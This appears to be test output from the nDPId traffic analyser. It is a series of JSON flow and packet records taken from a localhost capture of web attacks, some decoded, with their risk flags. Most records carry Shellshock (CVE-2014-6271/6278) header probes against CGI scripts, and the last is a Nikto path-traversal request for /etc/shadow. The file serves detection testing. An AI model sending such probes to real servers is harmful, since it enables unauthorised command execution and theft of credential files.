-00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":1,"flow_last_seen":1576420277460,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277460,"pkt":"AAAAAAAAAAAAAAAACABFAAEMyD1AAEAGc6x\/AAABfwAAAcVwH5BPvfDvcLTsqIAYAED\/AAAAAQEICp1m\/fydZv38R0VUIC90ZXN0LWNnaS5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1576420277462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277462,"pkt":"AAAAAAAAAAAAAAAACABFAAEIoLlAAEAGmzR\/AAABfwAAAcVyH5A1vJhjWIrHxIAYAED+\/AAAAQEICp1m\/f2dZv39R0VUIC90ZXN0LnB5IEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":1576420277463,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277463,"pkt":"AAAAAAAAAAAAAAAACABFAAEILLBAAEAGDz5\/AAABfwAAAcV0H5AN6xR8l7l+o4AYAED+\/AAAAQEICp1m\/f+dZv3+R0VUIC90ZXN0LnNoIEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":1576420277464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277464,"pkt":"AAAAAAAAAAAAAAAACABFAAEOUvlAAEAG6O5\/AAABfwAAAcV2H5BXVWoitNrsWoAYAED\/AgAAAQEICp1m\/gCdZv4AR0VUIC90bVVuYmxvY2suY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01169{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tmUnblock.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":1,"flow_last_seen":1576420277465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277465,"pkt":"AAAAAAAAAAAAAAAACABFAAEKgUVAAEAGuqZ\/AAABfwAAAcV4H5AZ0bmWzQ36cYAYAED+\/gAAAQEICp1m\/gGdZv4BR0VUIC91bmFtZS5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uname.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":1,"flow_last_seen":1576420277466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277466,"pkt":"AAAAAAAAAAAAAAAACABFAAEM2vpAAEAGYO9\/AAABfwAAAcV6H5AtBOIv4uMLlYAYAED\/AAAAAQEICp1m\/gKdZv4CR0VUIC92aWV3Y3ZzLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} 
-01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewcvs.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1576420277467,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277467,"pkt":"AAAAAAAAAAAAAAAACABFAAEITytAAEAG7MJ\/AAABfwAAAcV8H5BFlnf\/97sS7IAYAED+\/AAAAQEICp1m\/gOdZv4DR0VUIC93ZWxjb21lIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/welcome","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1576420277469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277469,"pkt":"AAAAAAAAAAAAAAAACABFAAEK4AFAAEAGW+p\/AAABfwAAAcV+H5B29+cpQb7It4AYAED+\/gAAAQEICp1m\/gWdZv4FR0VUIC93aG9pcy5jZ2kgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/whois.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":1,"flow_last_seen":1576420277471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277471,"pkt":"AAAAAAAAAAAAAAAACABFAAEB0rpAAEAGaTp\/AAABfwAAAcWAH5AE8+pw+\/3ZB4AYAED+9QAAAQEICp1m\/gedZv4HR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} 
-01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":1,"flow_last_seen":1576420277473,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1576420277473,"pkt":"AAAAAAAAAAAAAAAACABFAADnqaNAAEAGkmt\/AAABfwAAAcWCH5DlqJF6VmPeaYAYAED+2wAAAQEICp1m\/gmdZv4JR0VUIC8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvc2hhZG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpkaXNod2FzaGVyKQ0KDQo="} -01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/shadow","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:dishwasher)"}} 
